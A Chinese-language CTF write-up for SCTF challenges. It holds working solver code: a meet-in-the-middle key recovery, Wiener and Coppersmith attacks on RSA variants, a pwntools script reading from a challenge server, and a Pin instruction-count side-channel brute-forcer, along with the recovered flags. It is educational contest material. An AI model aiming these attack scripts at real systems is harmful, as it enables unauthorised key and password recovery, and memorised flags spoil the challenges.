xb是下标 ```c #include<stdio.h> char a[100]={ 0x00000002, 0x0000001A, 0x00000011, 0x0000001C, 0x00000018, 0x0000000B, 0x00000015, 0x0000000A, 0x00000010, 0x00000014, 0x00000013, 0x00000012, 0x00000003, 0x00000008, 0x00000006, 0x0000000C, 0x00000009, 0x0000000E, 0x0000000D, 0x00000016, 0x00000004, 0x0000001B, 0x0000000F, 0x00000017, 0x00000001, 0x00000019, 0x00000007, 0x00000005 }; char flag[100]="0abcdefghijklmnopqrstuvwxyziu"; char flag2[100]; char xb[400]; int main(){ flag[0]=0; for(int i=1;i<=28;i++){ xb[flag[i]]++; //记录下标 } int v7=0; for(int i=1;i<=200;i++){ v7+=xb[i]; xb[i]=v7; //求累加和 } int v10,v11; for(int i=28;i>0;i--){ v10=flag[i]; v11=xb[v10]; flag2[v11]=i; xb[v10]=v11-1; } for(int i=0;i<=28;i++){ printf("%x ",flag2[i]); } return 0; } ``` 逆向脚本: ```c #include<stdio.h> char xb[500]={ 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000002, 0x00000003, 0x00000004, 0x00000005, 0x00000006, 0x00000007, 0x00000008, 0x0000000A, 0x0000000B, 0x0000000C, 0x0000000D, 0x0000000E, 0x0000000F, 0x00000010, 0x00000011, 0x00000012, 0x00000013, 0x00000014, 0x00000015, 0x00000017, 0x00000018, 0x00000019, 0x0000001A, 0x0000001B, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C}; char a[100]={ 0,0x00000002, 0x0000001A, 0x00000011, 0x0000001C, 0x00000018, 0x0000000B, 0x00000015, 0x0000000A, 0x00000010, 0x00000014, 0x00000013, 0x00000012, 0x00000003, 0x00000008, 0x00000006, 0x0000000C, 0x00000009, 0x0000000E, 0x0000000D, 0x00000016, 0x00000004, 0x0000001B, 0x0000000F, 0x00000017, 0x00000001, 0x00000019, 0x00000007, 0x00000005 }; char flag[100]; int main(){ int v11,v10; for(int i=28;i>0;i--){ for(int j=1;j<=28;j++){ if(a[j]==i){ v11=j; //printf("%d,",v11); break; } } //for(int q=97;q<=122;q++){ // printf("%x ",xb[q]); //} //printf("!%x ",v11); for(int q=97;q<=122;q++){ if(xb[q]==v11){ v10=q; printf("%c ",q); } } printf("\n"); xb[v10]=v11-1; } return 0; } ``` 求出来 有的有多解 有的没有解 根据输入限制还原 再逆序即可 ## Crypto: ### ciruit map: 题目中使用的对称加密方式是使用两个密钥依次加密，这样的加密方式可以使用中间相遇攻击将它的安全性降至与单次加密相同。具体来说就是对一组明文m和密文c，先枚举第一次加密的密钥key1，将加密的结果E(key1,m)作为键、key1作为值使用哈希表存储下来，再枚举第二次加密的密钥key2，将D(key2,c)作为键在哈希表中查找，如果找到值则 (key1,key2) 就是一个合法的密钥。 本题的每一次加密不仅加密了明文，还加密了0作为校验，这给我们提供了明密文对。 但由于本题的明密文空间较小，而密钥空间较大，仅对一组明密文进行攻击会获得大量可能的密钥。所以还需要利用多组相关的密钥加密了同一个明文，找出真实的密钥。 使用上述方法对5、6两个门进行攻击，即可得到密钥，再按题目中的方式进行异或即可得到flag Exp:参考https://vergissmeinnichtz.github.io/posts/2021dicectf-writeup/ ```cpp #include <iostream> #include <unordered_map> #include <vector> using namespace std; unsigned int SBoxes[6][16] = { { 15, 1, 7, 0, 9, 6, 2, 14, 11, 8, 5, 3, 12, 13, 4, 10 }, { 3, 7, 8, 9, 11, 0, 15, 13, 4, 1, 10, 2, 14, 6, 12, 5 }, { 4, 12, 9, 8, 5, 13, 11, 7, 6, 3, 10, 14, 15, 1, 2, 0 }, { 2, 4, 10, 5, 7, 13, 1, 15, 0, 11, 3, 12, 14, 9, 8, 6 }, { 3, 8, 0, 2, 13, 14, 5, 11, 9, 1, 7, 12, 4, 6, 10, 15 }, { 14, 12, 7, 0, 11, 4, 13, 15, 10, 3, 8, 9, 2, 6, 1, 5 } }; unsigned int SInvBoxes[6][16] = { { 3, 1, 6, 11, 14, 10, 5, 2, 9, 4, 15, 8, 12, 13, 7, 0 }, { 5, 9, 11, 0, 8, 15, 13, 1, 2, 3, 10, 4, 14, 7, 12, 6 }, { 15, 13, 14, 9, 0, 4, 8, 7, 3, 2, 10, 6, 1, 5, 11, 12 }, { 8, 6, 0, 10, 1, 3, 15, 4, 14, 13, 2, 9, 11, 5, 12, 7 }, { 2, 9, 3, 0, 12, 6, 13, 10, 1, 8, 14, 7, 11, 4, 5, 15 }, { 3, 14, 12, 9, 5, 15, 13, 2, 10, 11, 8, 4, 1, 6, 0, 7 } }; unsigned int PBox[] = { 15, 22, 11, 20, 16, 8, 2, 3, 14, 19, 18, 1, 12, 4, 9, 13, 23, 21, 10, 17, 0, 5, 6, 7 }; unsigned int PInvBox[] = { 20, 11, 6, 7, 13, 21, 22, 23, 5, 14, 18, 2, 12, 15, 8, 0, 4, 19, 10, 9, 3, 17, 1, 16 }; unordered_map<unsigned int, unsigned int> middle_data; unsigned int S(unsigned int block, unsigned int SBoxes[6][16]) { unsigned int output = 0; for (int i = 0; i < 6; i++) { output |= SBoxes[i][(block >> 4 * i) & 0b1111] << 4 * i; } return output; } unsigned int permute(unsigned int block, unsigned int pbox[]) { unsigned int output = 0; unsigned int bit = 0; for (int i = 0; i < 24; i++) { bit = (block >> pbox[i]) & 1; output |= (bit << i); } return output; } unsigned int encrypt_data(unsigned int block, unsigned int key) { unsigned int res = block; for (int i = 0; i < 3; i++) { res ^= key; res = S(res, SBoxes); res = permute(res, PBox); } res ^= key; return res; } unsigned int decrypt_data(unsigned int block, unsigned int key) { unsigned int res = block; res ^= key; for (int i = 0; i < 3; i++) { res = permute(res, PInvBox); res = S(res, SInvBoxes); res ^= key; } return res; } unsigned int encrypt(unsigned int block, unsigned int key1, unsigned int key2) { unsigned int res = block; res = encrypt_data(res, key1); res = encrypt_data(res, key2); return res; } unsigned int decrypt(unsigned int block, unsigned int key1, unsigned int key2) { unsigned int res = block; res = decrypt_data(res, key2); res = decrypt_data(res, key1); return res; } void init_middle_data() { cout << "Init middle data" << endl; unsigned int enc = 0; for (unsigned int i = 0; i < 0x1000000; i++) { enc = encrypt_data(0, i); if (middle_data.find(enc) == middle_data.end()) { middle_data.insert(pair<unsigned int, unsigned int>(enc, i)); } else { unsigned int count = 0; unsigned int tmp = 0; do { count++; tmp = count << 24 | enc; } while (middle_data.find(tmp) != middle_data.end()); middle_data.insert(pair<unsigned int, unsigned int>(tmp, i)); } } } unordered_map<unsigned int, unsigned int> find_possible_key(unsigned int t) { cout << "Find possible keys for " << t << endl; unordered_map<unsigned int, unsigned int> result; unsigned int dec = 0; for (unsigned int i = 0; i < 0x1000000; i++) { unsigned int dec_count = 0; dec = decrypt_data(t, i); unsigned int dec_tmp = dec; while (middle_data.find(dec) != middle_data.end()) { unsigned int key = i; if (result.find(key) == result.end()) { result.insert(pair<unsigned int, unsigned int>(key, middle_data[dec])); } else { unsigned int count = 0; unsigned int tmp; do { count++; tmp = count << 24 | key; } while (result.find(tmp) != result.end()); result.insert(pair<unsigned int, unsigned int>(tmp, middle_data[dec])); } dec_count++; dec = dec_count << 24 | dec_tmp; } } return result; } unsigned int recover_key_part2(vector<unordered_map<unsigned int, unsigned int>> possible_keys, vector<unsigned int> enc_labels, unsigned int a0, unsigned int b0, int idxi, int idxj) { unordered_map<unsigned int, unsigned int> choice_keys; unsigned int c, c1, b1, a00; for (int i = 0; i < 4; i++) { if (i == idxi || i == idxj) continue; choice_keys = possible_keys[i]; c = enc_labels[i]; c1 = enc_labels[idxi]; for (auto iter = choice_keys.begin(); iter != choice_keys.end(); ++iter) { b1 = iter->first; if (b1 > 0x1000000) continue; unsigned int dec_b1 = b1; unsigned int count = 0; while (choice_keys.find(b1) != choice_keys.end()) { a00 = choice_keys[b1]; if (a0 == a00 && decrypt(c, a0, dec_b1) == decrypt(c1, a0, b0)) { return dec_b1; } count++; b1 = count << 24 | dec_b1; } } } return 0; } bool recover_key(vector<unordered_map<unsigned int, unsigned int>> possible_keys, vector<unsigned int> enc_labels) { unordered_map<unsigned int, unsigned int> choice_keys, choice_keys2; unsigned int c1, b0, a0, p1, c2, a1, b1; for (int i = 0; i < 4; i++) { cout << "Recover key " << i << endl; choice_keys = possible_keys[i]; c1 = enc_labels[i]; for (int j = 0; j < 4; j++) { if (i == j) continue; choice_keys2 = possible_keys[j]; c2 = enc_labels[j]; for (auto iter = choice_keys.begin(); iter != choice_keys.end(); ++iter) { b0 = iter->first; if (b0 >= 0x1000000) continue; unsigned int count = 0; unsigned int dec_b0 = b0; while (choice_keys.find(b0) != choice_keys.end()) { a0 = choice_keys[b0]; p1 = decrypt(c1, a0, dec_b0); unsigned int b0_tmp = dec_b0; unsigned int count_tmp = 0; while (choice_keys2.find(b0_tmp) != choice_keys2.end()) { a1 = choice_keys2[b0_tmp]; if (p1 == decrypt(c2, a1, dec_b0)) { b1 = recover_key_part2(possible_keys, enc_labels, a0, dec_b0, i, j); if (b1 != 0) { cout << "Find keys : a0 = " << a0 << ", b0 = " << b0 << endl; cout << "Find keys : a1 = " << a1 << ", b1 = " << b1 << endl; return true; } } count_tmp++; b0_tmp = count_tmp << 24 | dec_b0; } count++; b0 = count << 24 | dec_b0; } } } } return false; } unsigned int g_tables[2][4][2] = { { { 13303835, 2123830 }, { 2801785, 11303723 }, { 13499998, 248615 }, { 13892520, 7462011 } }, { { 3244202, 918053 }, { 3277177, 6281266 }, { 1016382, 7097624 }, { 10016472, 13600867 } } }; int main() { init_middle_data(); for (int i = 0; i < 2; i++) { vector<unordered_map<unsigned int, unsigned int>> possible_keys(4); vector<unsigned int> enc_labels(4); for (int j = 0; j < 4; j++) { possible_keys[j] = find_possible_key(g_tables[i][j][1]); enc_labels[j] = g_tables[i][j][0]; } recover_key(possible_keys, enc_labels); } } ``` ### cubic: 首先维纳攻击进行n的分解 ```python import gmpy2 def transform(x,y): res=[] while y: res.append(x//y) x,y=y,x%y return res def continued_fraction(sub_res): numerator,denominator=1,0 for i in sub_res[::-1]: denominator,numerator=numerator,i*numerator+denominator return denominator,numerator def sub_fraction(x,y): res=transform(x,y) res=list(map(continued_fraction,(res[0:i] for i in range(1,len(res))))) return res def get_pq(a,b,c): par=gmpy2.isqrt(b*b-4*a*c) x1,x2=(-b+par)//(2*a),(-b-par)//(2*a) return x1,x2 def wienerAttack(e,n): for (d,k) in sub_fraction(e,n): if k==0: continue if (e*d-1)%k!=0: continue phi=(e*d-1)//k px,qy=get_pq(1,n-phi+1,n) if px*qy==n: p,q=abs(int(px)),abs(int(qy)) return p,q e = 9533278200186123232236255017820030899569321116975283610713219562976859282824769175839530288456710655549433026017454019192757166179005337670254091772646437151243714834367106636896725901744638364418760602224374324165775574770864986671566019730363538367466997593727876882822226184151038893879103698443945293847761718465733847048318476592993938546577400002229026755758669459562980676284055764279623940654524820913748828674997382229998030130717936535141033821755462081778813604611338986102222660371803785762969181621218624796493312572275511971794882449038824970725178686293662493656905459347774879501185875539718874596705 n = 14533245492446527990345804759759265012893540862095541076764366082162576424755678240374119853002994542918519612781550114466644551880575428571787273115280704900606787020945247741998359421177511929458079825267036269693713148678862507031531248089239354359191143729297092801032361602172716175954312630588896757718042441989110187870325071709527175394543291651133818077232316593509803919091438980501420924485255304400323647448229591713022185198524897342992169577444483465121248099368278930389563834415446275706495338241714074151990802889614140955511002526006908659733001659342145618261258586334209496357584069738531543185643 p,q=wienerAttack(e,n) print(p,q) ``` 一般群阶大概率为p^k-1，猜测尝试得到满足阶为p^3-1 ```python from Crypto.Util.number import * p = 115356711636749245156428519458636760545287171955837394007931505138890850701876498266134803543895098613075361320835965827472765949794003038903506822615342957623004533347868289057693604661343441236478222117768645098958342143045640790153260606746369968440132414640921105454181075856858313645232243646490791143429 q = 125985261596314996949393327666347537665507236994609367083543107427822419313343886798160820715681669638794070650250819706819457380274959897647804094613682989233500345434447381207712718027522538346527719121207487881267812370653129045663352226625659915082751177397671798591739316392072747999992839263298815877167 cipher = (19401192786966300532063177618773965478538951716844906979027097461882319271723756535227025371366424481096803190792137439173058427577594858006479190632023945291395553010462159807986006596072405263490861756087442717134978083923641809766850473777710604477252916210877891252017405744142227511286767829269553294336756529935586192065089420814422102488899440429178931646662530829741013344995653698777374392519058638770425295595568042139898993932719608481941701573299167516692153488013255445514390718011610678985078041611587192596195431273759849201865428200777127652247124701499844530845285581747664809197645372537112907753294744666809939100248832526975988078979846304735556676879070283372620407563114079549390001614799409235247430564281086028723268710367808857295000524215328789488393516899819570225687309921170070400449014698288214878049935514150656414112003665253918449695508103327478082775164329716254328417047786485715850849491, 781345565099013799262792311376039553581950277400853785676734743854876406972350007716903106115125771065169204495496180297257809292105173197174813132213006684314530872985622881055672616933023112300221070497375397535378206020875309068272094018415338953584215096897052296848052275326788043519255038653375446710420286057685279061546543355323454291614710011662212021015262569351351041865697991928279541885568927192751464222353378141819281693362464536421214120712733991912395062495944602752835629568101437486725616698427495555701421076231109563764495081513237064117298426845564929666308059091066733289775789699894898615709137339594895445533569418324483308859638701245164859339421118392040280281680683626195400974220189495986948519076368788184937032480616161120543458690020582758071619538749391382511525334607462520186940933475378898157280914896196668892146480551051128480840137563017179495847486710185694855735521798106210110142721) padding = 93159292640264950611710682227074947882037468832573625293582195909275172905258002329209847723845892457894618211087939941465457691732712138554758169033813255339835367015850182903569284007604039649586605297810361911121565847931915078370592312225824613495742165146077915195241520260410992313667954037284958254599 e = 9533278200186123232236255017820030899569321116975283610713219562976859282824769175839530288456710655549433026017454019192757166179005337670254091772646437151243714834367106636896725901744638364418760602224374324165775574770864986671566019730363538367466997593727876882822226184151038893879103698443945293847761718465733847048318476592993938546577400002229026755758669459562980676284055764279623940654524820913748828674997382229998030130717936535141033821755462081778813604611338986102222660371803785762969181621218624796493312572275511971794882449038824970725178686293662493656905459347774879501185875539718874596705 d = inverse(e, ((p**3)-1)*((q**3)-1)*((padding**3)-1)) def add(P, Q, mod): x1, y1 = P x2, y2 = Q if x2 is None: return P if x1 is None: return Q if y1 is None and y2 is None: x = x1 * x2 % mod y = (x1 + x2) % mod return (x, y) if y1 is None and y2 is not None: x1, y1, x2, y2 = x2, y2, x1, y1 if y2 is None: if (y1 + x2) % mod != 0: x = (x1 * x2 + 2) * inverse(y1 + x2, mod) % mod y = (x1 + y1 * x2) * inverse(y1 + x2, mod) % mod return (x, y) elif (x1 - y1 ** 2) % mod != 0: x = (x1 * x2 + 2) * inverse(x1 - y1 ** 2, mod) % mod return (x, None) else: return (None, None) else: if (x1 + x2 + y1 * y2) % mod != 0: x = (x1 * x2 + (y1 + y2) * 2) * inverse(x1 + x2 + y1 * y2, mod) % mod y = (y1 * x2 + x1 * y2 + 2) * inverse(x1 + x2 + y1 * y2, mod) % mod return (x, y) elif (y1 * x2 + x1 * y2 + 2) % mod != 0: x = (x1 * x2 + (y1 + y2) * 2) * inverse(y1 * x2 + x1 * y2 + 2, mod) % mod return (x, None) else: return (None, None) def myPower(P, a, mod): target = (None, None) t = P while a > 0: if a % 2: target = add(target, t, mod) t = add(t, t, mod) a >>= 1 return target n = p*q*padding M = myPower(cipher,d,n) print(long_to_bytes(M[0])+long_to_bytes(M[1])) #SCTF{@@##Say_say_it_again_Sometimes_the_RSA_was_winding_in_my_mind@@##} ``` ### ChristmasZone: 首先分解N  找到论文https://eprint.iacr.org/2021/1160.pdf 利用二元copper分解N 然后整个Complex部分就是个复数乘法群，那么阶就是  求出最初的flag点，然后最后先求出a,b,x再解同余方程   ```python #分解N ''' import itertools def small_roots(f, bounds, m=1, d=None): if not d: d = f.degree() R = f.base_ring() N = R.cardinality() f /= f.coefficients().pop(0) f = f.change_ring(ZZ) G = Sequence([], f.parent()) for i in range(m+1): base = N^(m-i) * f^i for shifts in itertools.product(range(d), repeat=f.nvariables()): g = base * prod(map(power, f.variables(), shifts)) G.append(g) B, monomials = G.coefficient_matrix() monomials = vector(monomials) factors = [monomial(*bounds) for monomial in monomials] for i, factor in enumerate(factors): B.rescale_col(i, factor) B = B.dense_matrix().LLL() B = B.change_ring(QQ) for i, factor in enumerate(factors): B.rescale_col(i, 1/factor) H = Sequence([], f.parent().change_ring(QQ)) for h in filter(None, B*monomials): H.append(h) I = H.ideal() if I.dimension() == -1: H.pop() elif I.dimension() == 0: roots = [] for root in I.variety(ring=ZZ): root = tuple(R(root[var]) for var in f.variables()) roots.append(root) return roots return [] N=64392795853847475796939596948374573513341136006013188358665448316305707477998438325517993586430100318003625505157712138814030987620038360820900112359350226402638642419396935215229157012026467896203963294845355310085476165076942465877433408205263068546705226319393063008332679430070032638523530045872344446063 e=2122057207992053205813770227849040233008910764365408170807753866052370273036652511326089337097360978735074872616654616913246201310148862001548717525315340025551386286859760434183016041810428435636703565295076056164899655565064479034568939414539781862057507880933035055798925469493379171063624396109774778347319852379080566673380010455470481679145108944783447900704049011034802113265281840271722439782048757303053321402550218515376334799866137565004833177407151305907248656027100625115285653505268015889011758846754314363803434935375750532978323034293333866829909394024977100845590141939498841156488858312084500963993 a=N+1 b=N*N-N+1 PR.<x,y> = PolynomialRing(Zmod(e)) f=x*(y*y+a*y+b)+1 #x=k,y=p+q #r=1.999 #gamma=0.569=0.6 from gmpy2 import * #bounds=(N**gamma,3N**0.5) bounds=(2^400, 2^513) m=3 d=4 roots=small_roots(f,bounds,m,d) print(roots) ''' k,p_q=(832657684263002794400448147505043120968204846370594452803058346727684829479897185371522848727041695401569106922002807594, 16075043011792317702314886102947415867389005788775646985921769735667763497545302824191943535380623937133010105678608525588010746665008631519574789537497184) N=64392795853847475796939596948374573513341136006013188358665448316305707477998438325517993586430100318003625505157712138814030987620038360820900112359350226402638642419396935215229157012026467896203963294845355310085476165076942465877433408205263068546705226319393063008332679430070032638523530045872344446063 from z3 import * s=Solver() p,q=Ints('p q') s.add(p*q==N) s.add(p+q==p_q) if s.check()==sat: print(s.model()) #求出flag点 val=(19398712966389173067515660342342371376171822855077792430320907920482468319034356508473830699130119726502328267606091971072624658237697431558761718296916369668202230512807622341524837789641448767802361925545348467904711602267688826344269930586157457184165009996779745720616560780946563277776544719243932403743, 13560918884675796397422230974896753903564514060544004622609605573166124357809803049342207856908237157989458174631058128913271365699175849042916944962684319362603309646697695167167430136068004838289739138033112696576679443996914506782400912475705559889360576361738784125657707992917972167925405463413645788482) from Crypto.Util.number import * from gmpy2 import * ''' class Complex: baseRe = 1 baseIm = 0 p= 7580404339410605275626408632293985390119410811758716323067754026905773097627216054700243523685903084284434158078654472410013702925363551739091210471600391 q= 8494638672381712426688477470653430477269594977016930662854015708761990399918086769491700011694720852848575947599954053177997043739645079780483579065896793 n = p*q def __init__(self, re=0, im=0): self.re = re self.im = im def OnePlus(self): _re = (self.re*Complex.baseRe - self.im*Complex.baseIm)%Complex.n _im = (self.re*Complex.baseIm + self.im*Complex.baseRe)%Complex.n Complex.baseRe = _re Complex.baseIm = _im def Double(self): _re = (self.re*self.re - self.im*self.im)%Complex.n _im = (self.re*self.im + self.im*self.re)%Complex.n self.re = _re self.im = _im def val(self): return Complex.baseRe,Complex.baseIm def PowPlus(msg,k): c=Complex(msg[0],msg[1]) while k>0: if k%2: k-=1 c.OnePlus() else: k//=2 c.Double() return c.val() p=7580404339410605275626408632293985390119410811758716323067754026905773097627216054700243523685903084284434158078654472410013702925363551739091210471600391 q=8494638672381712426688477470653430477269594977016930662854015708761990399918086769491700011694720852848575947599954053177997043739645079780483579065896793 phi=(p*p-1)*(q*q-1) e=65537 d=invert(e,phi) msg=PowPlus(val,d) print(msg) ''' flag=(13458941155903781745318542945248240520288022871426293450041877950876934401820075861658649941877200506804179539037273445647178076379765310943409348968500704892576232812799061850508823209830576134649486426818217295514628123166401568455514599, 6941688215698327989241745769756907425148630013096044042603905768142844248813832790128191811856003007063084884943722942299621842637652050853355451338819196414391565056348609341946213402001658140600019834638926985700204831449557863272939839) flag=bytes_to_long(long_to_bytes(flag[0])+long_to_bytes(flag[1])) print(flag) #求a,b,x p= 12827136631950660209216359962655539318636877290716821157529934201187219916291097512646340799814928196320503957951369709433553128222068986394496491383172957 PR.<a,b,x> = PolynomialRing(Zmod(p)) def g(): global a, b, x x = a*x + b return x f=[g() for _ in range(6)] X=[[i**j for j in range(0,6)] for i in range(1,5)] vs=vs= [(1, 41380349828344668841722013593988154321093099094259357736377736864534670060706791545109606752287504685771188039864996559723310519654574206262666374726529575), (2, 384991383452695588666216941014720946683784460631264884797727791455132234632438790091275812930469701960771509347594917989067900680524277581738313254612711871), (3, 2324819542625170348844359780621276807555503871252850096339863557086701529895982915686058495680950841284900600209950521822433876540926171344905286018406959743), (4, 9038337376811138597523510592313164861722600343233504981317555262132010358260176119807566000121093361554267202529233467631393363767071867844509978588374760233)] fx=[sum([ t*l for t,l in zip(f,X[i])])-vs[i][1] for i in range(4)] I= ideal(fx) res=I.variety() print(res) #{a: 9860193694955454493300669933320904531057702167008792383985842819906078670580802987731895663413356860994843912318440780246676743568551475523420776908741413, b: 2958518750440700920796763935867151936933867742211437957765135895192638631654440432476368712469580981169108680123754523389166157366216732312196552911319913, x: 7734812378399820171163995318293652173453261567870977388529908085981201925492169234860698753203222342796394099866681768405890780154318583282220110890441936} #最后解同余方程 p=12827136631950660209216359962655539318636877290716821157529934201187219916291097512646340799814928196320503957951369709433553128222068986394496491383172957 a=9860193694955454493300669933320904531057702167008792383985842819906078670580802987731895663413356860994843912318440780246676743568551475523420776908741413 b=2958518750440700920796763935867151936933867742211437957765135895192638631654440432476368712469580981169108680123754523389166157366216732312196552911319913 x=7734812378399820171163995318293652173453261567870977388529908085981201925492169234860698753203222342796394099866681768405890780154318583282220110890441936 def g(): global a, b, x x=(a*x+b)%p return x PR.<X> = PolynomialRing(Zmod(p)) f = g() + g()*X + g()*X**2 + g()*X**3 + g()*X**4 + g()*X**5 f=f-350564116714246428053802172070389474233820454679751477780333001945330301565284220095378516478556445046920811976843797532587184369824085245405082799485151297628128033782611724987963819163245257329754695802584996154786305817413634573781285885239952095626683987775731171250077614548234305028236410536510063272314122315196083472829068485752967550562846302833889516005729928622362083333892583681788035557019567883417091108619687009927945069447260541066489511357746392173728172212543 print(f.roots()) #34252413418138665913069510570108663017477763145042638644010243453 #SCTF{all1Want4ChristmasisU} ``` ## Misc: ### fumo_xor_cli: 命令行里的图片用WMCTF2021那道题的方式提取出所有图片，其中第21/27张都是像素点，脚本如下: ```python from pwn import * r = remote("124.70.150.39", 2333) r.recv() while True: data = r.recv() f = open("data.txt", "ab").write(data) import re from PIL import Image pixel_pattern = b"\[38;2;(.*?);(.*?);(.*?)m" p = re.compile(pixel_pattern) f = open("data.txt", "rb").read() li = f.split(b"\n\n") j = 0 for content in li: byte_pixels = p.findall(content) pixels = [] for pixel in byte_pixels: r = int(pixel[0]) g = int(pixel[1]) b = int(pixel[2]) pixels.append((r, g, b)) print(pixels) width = 133 height = 50 img = Image.new("RGB", (width, height)) i = 0 for y in range(height): for x in range(width): pixel = pixels[i] img.putpixel((x, y), pixel) i = i + 1 filename = str(j) + ".png" img.save(filename) j = j + 1 ``` 在cli中还得到https://mp.weixin.qq.com/s/E_iDJBkVEC4jZanzvqnWCA  文章末尾有  很明显的像素点在里面，查看原图提取出一张133*100的像素点图，cli中的为133*50的像素点图，反复旋转拼接尝试，27在上21在下，与提取图片异或得到flag图片  反色后得到  又因为本题无数字所以 Flag:`SCTF{Good_FuMo_CTF_OvO}` ### low_re: 首先程序运行的时候转储内存得到以下字符串 ``` [ANSI] 0x0001a450: please input your flag: [ANSI] 0x0001a470: cline_in_traceback [ANSI] 0x0001a490: hello challanger [ANSI] 0x0001a4a8: you are right [ANSI] 0x0001a4b8: tmpj25m9hqm [ANSI] 0x0001a4c8: hexdigest [ANSI] 0x0001a4d8: encoding [ANSI] 0x0001a4e8: Sycl0ver [ANSI] 0x0001a4f8: hashlib [ANSI] 0x0001a500: dataLen [ANSI] 0x0001a508: update [ANSI] 0x0001a50f: sha256 [ANSI] 0x0001a518: __import__ [ANSI] 0x0001a523: append [ANSI] 0x0001a52a: utf-8 [ANSI] 0x0001a530: range [ANSI] 0x0001a536: print [ANSI] 0x0001a53c: input [ANSI] 0x0001a542: error [ANSI] 0x0001a548: __test__ [ANSI] 0x0001a558: __name__ [ANSI] 0x0001a568: __main__ [ANSI] 0x0001a571: exit [ANSI] 0x0001a576: data ``` hash表: ``` [ANSI] 0x0001a0a0: 97e45e15c74f71ea59ffffb40298f2e5dec119c2205e434e3a0d2510c331037f [ANSI] 0x0001a100: 85ddd3721d173367465373f75e190bd937a8dc3588d5d82ebff8104dec88ac3e [ANSI] 0x0001a160: 78f92a6ad9ffcec47f30e3ca3d18065bdba9c020ff5f477b801d11efdfaa9cd0 [ANSI] 0x0001a1c0: 62c62ce7768a4836b10495317a32da6e3943d522bc3b9797ff0a44931e966a31 [ANSI] 0x0001a220: 54cb43f463ea082699131b71d45fb0384f8c2f598e8f0072b960b4add731e048 [ANSI] 0x0001a280: 52080868c07a9ef5646b5f0b198f04f013cf23cfbfb06123d8f2fdd63d359123 [ANSI] 0x0001a2e0: 51b7d78cfe25ede262fd85a65b24721f076ab9dd6562403878ca5cde1ebf3219 [ANSI] 0x0001a340: 5023939dca9273fd767d5e4ea329846f9816af461e170b6db8d20b6e5ff3de8c [ANSI] 0x0001a3a0: 1a6aafb16a23ffde40c426d5c87f5afcc77fffc96cf041dc8dd2c47e706a7ecb [ANSI] 0x0001a400: 127291de1f4cbbb35c41556a3c6d5a64f08661bc7ed394ea6210354e6218ad93 [ANSI] 0x00019e20: f69b52599973fc5915ad1d435236863252dc3fd460989bd9f56ffc199ef8ff36 [ANSI] 0x00019e80: ee197bbac1b0e09c425e1dfd30cea2506bd493a674c4de90d9afbe5abc700b06 [ANSI] 0x00019ee0: e9552f8c3e518306524fa9c9728ad6dee88fa611aa3068c169217f173964f9b4 [ANSI] 0x00019f40: e6222354b50e4d33d73314b515b325633e57a105758e20aca23eb2dadd625f3f [ANSI] 0x00019fa0: d6eeac4ea40f9513391ef0bf72aa2fd2588889cb9d5f4cc638ce4d2c5509527b [ANSI] 0x0001a000: a1cd6c7990abb6b271695381d78898ec5c4880fbc0f6a0c9fda064422f21361e ``` 通过hash数量以及pintools的返回结果测出flag长度为17 (其工作原理是每次输入对了，就指令数量会多很多) 写脚本进行侧信道攻击 ```python import subprocess password = "_________________" pos = 0 last_cnt = 630000000 delta = 29000000 import string table = string.printable[:94] for i in range(17): for j in table: cur_pwd = password[0:pos] + j + password[pos + 1:] print ('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe echo ' + cur_pwd + ' | .\\pin.exe -t source\\tools\\ManualExamples\\obj-intel64\\inscount0.dll -- .\\low_re') subprocess.call('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe echo ' + cur_pwd + ' | .\\pin.exe -t source\\tools\\ManualExamples\\obj-intel64\\inscount0.dll -- .\\low_re', shell=True) res = int(open("inscount.out").read().split()[-1]) if res > last_cnt + delta: last_cnt = res password = cur_pwd pos += 1 break print(password) ```  成功截图  Flag:`SCTF{S1deCh4nnelAtt@ck}` ### This_is_A_tree: 根据目录名判断压缩包结构是一棵二叉树，中序遍历后得到 ``` 